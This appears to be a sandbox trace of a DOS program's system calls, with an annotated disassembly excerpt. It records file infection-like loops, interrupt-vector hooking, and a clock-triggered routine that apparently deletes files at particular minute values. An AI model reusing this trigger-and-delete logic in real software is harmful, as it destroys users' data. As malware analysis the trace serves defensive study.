2018-12-25T12:23:36.952361861Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.953877363Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.956160545Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.959386806Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.965453757Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.972427166Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.974150332Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.981197426Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.992779977Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.995922815Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:37.00220398Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:37.013100359Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:37.020043792Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:37.021783761Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:37.02839906Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:37.030077425Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:37.032727829Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:37.035554343Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:37.038014925Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:37.044513142Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:37.048057182Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:37.056729332Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:37.059186915Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:37.063114924Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:37.064825736Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:37.066459838Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:37.07083678Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:37.076856335Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:37.083304062Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:37.085858851Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:37.093466582Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:37.103012601Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:37.106993261Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:37.11381376Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:37.124382896Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:37.132008021Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:37.134020192Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:37.139591741Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:37.141360934Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:37.144196419Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:37.146658953Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:37.149234733Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:37.164944347Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:37.167650771Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:37.175043547Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:37.178125291Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:37.181376231Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:37.183087306Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:37.185296104Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:37.189013522Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:37.196881908Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:37.203722753Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:37.205503458Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:37.212334245Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:37.222666077Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:37.223956073Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:37.228061377Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:37.232347595Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:37.233841255Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:37.238177512Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:37.240293353Z 59 PC: 15220 | Change current directory
2018-12-25T12:23:37.244437454Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5    ; listing starts at the PC logged for the Get time call, so cl is its return value (DOS Get time returns minutes in CL); the compares below dispatch on it
0x1523f: jne 0x15244
0x15241: call 0x1534a                     ; reached only when cl == 5; target body is not in this window
0x15244: cmp cl, 0xd                      ; NOTE(review): assumes the call above preserves cl - not verifiable from this window
0x15247: jne 0x1524c
0x15249: call 0x15359                     ; reached only when cl == 0x0d (13); target body is not in this window
0x1524c: cmp cl, 0x1e
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]    ; dx = bp-relative address handed to the helper at 0x15330
0x15255: call 0x15330                     ; reached only when cl == 0x1e (30)
0x15258: cmp cl, 0x28
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]    ; same dx operand as the cl == 0x1e case
0x15261: call 0x15330                     ; reached only when cl == 0x28 (40)
0x15264: cmp cl, 0x32
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]    ; different dx operand from the two cases above
0x1526d: call 0x15330                     ; reached only when cl == 0x32 (50); the trace entries that follow (Find first file at 15337, attributes at 15345, Delete file at 15349) sit just past 0x15330, so the helper presumably looks up and deletes the file dx names - confirm against the full disassembly
0x15270: lea si, word ptr [bp + 0x195]    ; common continuation after the time-conditional calls; behaviour here is clock-dependent, so a single sandbox run exercises at most the branch matching its clock
0x15274: lea di, word ptr [bp + 0x18d]    ; si/di now hold two bp-relative addresses; the window ends here, so their use is not shown
2018-12-25T12:23:37.247236837Z 78 PC: 15337 | Find first file
2018-12-25T12:23:37.254788147Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:37.264533712Z 65 PC: 15349 | Delete file (See above)
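2018-12-25T12:23:37.300154748Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate'; note: that label is the name of INT 21h function 00h, whereas the number given here is an interrupt vector number, and vector 00h is the CPU divide-error vector)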
2018-12-25T12:23:37.302500335Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.303611236Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.304779662Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.3065768Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.307975341Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.309697179Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.311199989Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.312557218Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.314687824Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.316374311Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.31762016Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.319653476Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.321502664Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.322850767Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.325970654Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.327063049Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.328510318Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.330328753Z 53 PC: 14fba | Get interrupt vector (See above)
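2018-12-25T12:23:37.331999135Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate'; note: the AKA labels on this and the next three entries are names of INT 21h functions with the same number, not of the vectors being set; vector 00h is the CPU divide-error vector)
2018-12-25T12:23:37.333260219Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records'; note: vector 35 = 23h is the DOS Ctrl-C/Ctrl-Break handler vector)
2018-12-25T12:23:37.335231144Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number'; note: vector 36 = 24h is the DOS critical-error handler vector)
2018-12-25T12:23:37.336783271Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device'; note: vector 63 = 3Fh is conventionally the overlay-manager interrupt)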
2018-12-25T12:23:37.338441627Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:37.494019224Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
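2018-12-25T12:23:37.496530479Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate'; note: that label is the name of INT 21h function 00h, whereas the number given here is an interrupt vector number, and vector 00h is the CPU divide-error vector)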
2018-12-25T12:23:37.497969305Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.500321584Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.502161111Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.503587573Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.505713442Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.507418599Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.508785755Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.510833719Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.512570176Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.513898771Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.516017318Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.517397835Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.518452707Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.520215285Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.521339411Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.522369519Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.524419407Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.52544443Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.52649359Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.529375324Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.531338878Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.533571188Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.536523936Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.538504222Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.54048268Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.543547582Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.545715624Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.547983968Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.551199809Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.553408648Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.555660932Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.558563941Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.560820916Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.563093993Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.56615715Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.568424995Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.570684532Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.57373138Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.57618695Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.578514729Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.581390826Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.584418083Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.58669122Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.589693785Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.592366702Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.59458754Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.597564476Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.600074055Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.602309691Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.605320284Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.607712714Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.614824069Z 76 PC: 15150 | Terminate with return code (Return code = '200')